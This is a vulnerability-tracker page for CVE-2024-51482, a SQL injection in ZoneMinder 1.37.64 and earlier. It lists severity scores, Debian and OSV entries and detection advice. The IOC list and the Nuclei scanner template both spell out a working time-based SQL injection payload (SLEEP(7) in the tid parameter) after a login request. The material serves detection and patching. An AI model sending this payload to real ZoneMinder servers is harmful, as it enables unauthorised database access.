CVE-2024-51482
published 2024-10-31CVE-2024-51482: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in…
PriorityP274critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
EXPLOIT
EPSS
36.90%
98.3th percentile
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | zoneminder | — | — |
| zoneminder | zoneminder | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy)
url/zm/index.php?view=request&request=event&action=removetag&tid=1
- →Detect time-based blind SQL injection attempts against ZoneMinder's removetag action by monitoring for SLEEP() payloads in the 'tid' parameter of requests to /zm/index.php with action=removetag.
- →A successful exploitation probe returns HTTP 200 with a response body containing '{"result":"OK"' and a response duration >= 7 seconds, indicating a successful time-delay injection.
- →Monitor POST requests to /zm?view=login followed by GET requests to the removetag endpoint; this two-step pattern (authenticate then exploit) is the attack chain for CVE-2024-51482.
- →The vulnerable code path is specifically in web/ajax/event.php; alert on any SQL-injection-like patterns (AND, SLEEP, SELECT subqueries) appearing in the 'tid' query parameter routed through this file. ↗
- ·The vulnerability affects only ZoneMinder versions 1.37.* up to and including 1.37.64; version 1.37.65 and later are patched and should not be targeted by this specific exploit path. ↗
- ·Exploitation requires a prior authenticated session; the attack chain involves a login step before the SQL injection request, so unauthenticated detections alone may miss the full attack sequence.
- ·The nuclei template uses a 30-second timeout for the injection request (@timeout: 30s) with a SLEEP(7) payload; detection rules based on response time should account for network latency to avoid false negatives.
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
osv9.9CRITICAL
vendor_debian9.9LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2024-51482: zoneminder - ZoneMinder is a free, open source closed-circuit television software application...
vendor_debian·2024·CVSS 9.9
CVE-2024-51482 [CRITICAL] CVE-2024-51482: zoneminder - ZoneMinder is a free, open source closed-circuit television software application...
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
OSV
CVE-2024-51482: ZoneMinder is a free, open source closed-circuit television software application
osv·2024-10-31·CVSS 9.9
CVE-2024-51482 [CRITICAL] CVE-2024-51482: ZoneMinder is a free, open source closed-circuit television software application
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
No detection rules found.
Nuclei
ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
nuclei·CVSS 9.9
CVE-2024-51482 [CRITICAL] ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
ZoneMinder v1.37.* "
- "ZoneMinder Login"
- "ZoneMinder"
condition: or
internal: true
- raw:
- |
POST /zm?view=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=login&postLoginQuery=&username={{username}}&password={{password}}
- |
GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"result\":\"OK")'
internal: true
- raw:
- |
@timeout: 30s
GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b76cf9b3ac27ea87b83e5bda75eae98298c3d8581ef960c5923888f66bdc24a102202f7
2024-10-31
Published